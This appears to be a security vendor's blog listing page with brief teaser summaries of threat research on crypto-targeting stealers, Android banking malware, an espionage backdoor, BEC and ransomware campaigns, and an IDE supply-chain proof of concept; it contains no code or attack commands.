

Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs
We discovered an active campaign targeting Eastern Europeans in the cryptocurrency industry using fake job lures.
In 2023, cybercriminals and defenders alike will have to move forward with caution in the face of a business landscape that’s fraught with security blindsides and economic ebbs and flows.
We discovered an active campaign targeting Eastern Europeans in the cryptocurrency industry using fake job lures.
In this investigation, we analyzed several prominent "passive income" applications and found out that there may be security risks upon participating in these programs.
Trend Micro named one of 2023’s coolest cloud security companies
We look into an ongoing malware campaign we named TgToxic, targeting Android mobile users in Taiwan, Thailand, and Indonesia since July 2022. The malware steals users’ credentials and assets such as cryptocurrency from digital wallets, as well as money from bank and finance apps. Analyzing the automated features of the malware, we found that the threat actor abused legitimate test framework Easyclick to write a Javascript-based automation script for functions such as clicks and gestures.
We analyze an infection campaign targeting organizations in the Middle East for cyberespionage in December 2022 using a new backdoor malware. The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers.
We analyze a BEC campaign targeting large companies around the world that was leveraging open-source tools to stay under the radar.
Stay informed and stay ahead
Trend Micro researchers discovered a new ransomware that abuses the APIs of a legitimate tool called Everything, a Windows filename search engine developed by Voidtools that offers quick searching and real-time updates for minimal resource usage.
In this proof of concept, we look into one of several attack vectors that can be abused to attack the supply chain: targeting the developer. With a focus on the local integrated developer environment (IDE), this proof considers the execution of malicious build scripts via injecting commands when the project or build is incorrectly “trusted”.
In this blog entry, we’d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.